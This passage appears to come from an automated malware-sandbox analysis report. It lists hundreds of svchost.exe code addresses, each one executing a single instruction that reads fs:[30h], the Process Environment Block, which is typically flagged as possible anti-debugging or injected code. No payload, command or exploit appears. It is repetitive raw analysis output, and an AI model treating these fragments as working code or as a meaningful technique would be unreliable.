Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]	2_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]	2_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]	2_2_03A2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]	2_2_03A36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]	2_2_03A70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]	2_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]	2_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]	2_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]	2_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]	2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]	2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]	2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]	2_2_03B061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]	2_2_03A601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]	2_2_03A60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]	2_2_03AF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]	2_2_03A2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]	2_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]	2_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]	2_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]	2_2_03AC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]	2_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]	2_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]	2_2_03A3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_03A2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]	2_2_03A380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]	2_2_03AB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]	2_2_03A2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]	2_2_03A720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]	2_2_03AB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]	2_2_03A2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]	2_2_03A2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h]	2_2_03AC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]	2_2_03AB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]	2_2_03A5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]	2_2_03A32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]	2_2_03AB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]	2_2_03A307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h]	2_2_03AD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]	2_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]	2_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]	2_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]	2_2_03ABE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]	2_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]	2_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]	2_2_03AB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]	2_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]	2_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]	2_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]	2_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]	2_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]	2_2_03AAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]	2_2_03A6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]	2_2_03A30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]	2_2_03A60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]	2_2_03A38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]	2_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]	2_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]	2_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]	2_2_03A30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]	2_2_03ABE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]	2_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]	2_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]	2_2_03AB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]	2_2_03A6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]	2_2_03A666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]	2_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]	2_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]	2_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]	2_2_03A4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]	2_2_03A66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]	2_2_03A68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]	2_2_03A3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]	2_2_03AAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]	2_2_03A72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]	2_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]	2_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]	2_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]	2_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A62674 mov eax, dword ptr fs:[00000030h]	2_2_03A62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4C640 mov eax, dword ptr fs:[00000030h]	2_2_03A4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]	2_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]	2_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32582 mov eax, dword ptr fs:[00000030h]	2_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32582 mov ecx, dword ptr fs:[00000030h]	2_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64588 mov eax, dword ptr fs:[00000030h]	2_2_03A64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E59C mov eax, dword ptr fs:[00000030h]	2_2_03A6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A325E0 mov eax, dword ptr fs:[00000030h]	2_2_03A325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A365D0 mov eax, dword ptr fs:[00000030h]	2_2_03A365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6500 mov eax, dword ptr fs:[00000030h]	2_2_03AC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]	2_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]	2_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]	2_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]	2_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]	2_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A364AB mov eax, dword ptr fs:[00000030h]	2_2_03A364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A644B0 mov ecx, dword ptr fs:[00000030h]	2_2_03A644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]	2_2_03ABA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A304E5 mov ecx, dword ptr fs:[00000030h]	2_2_03A304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]	2_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]	2_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]	2_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C427 mov eax, dword ptr fs:[00000030h]	2_2_03A2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A430 mov eax, dword ptr fs:[00000030h]	2_2_03A6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]	2_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]	2_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]	2_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC460 mov ecx, dword ptr fs:[00000030h]	2_2_03ABC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]	2_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]	2_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]	2_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
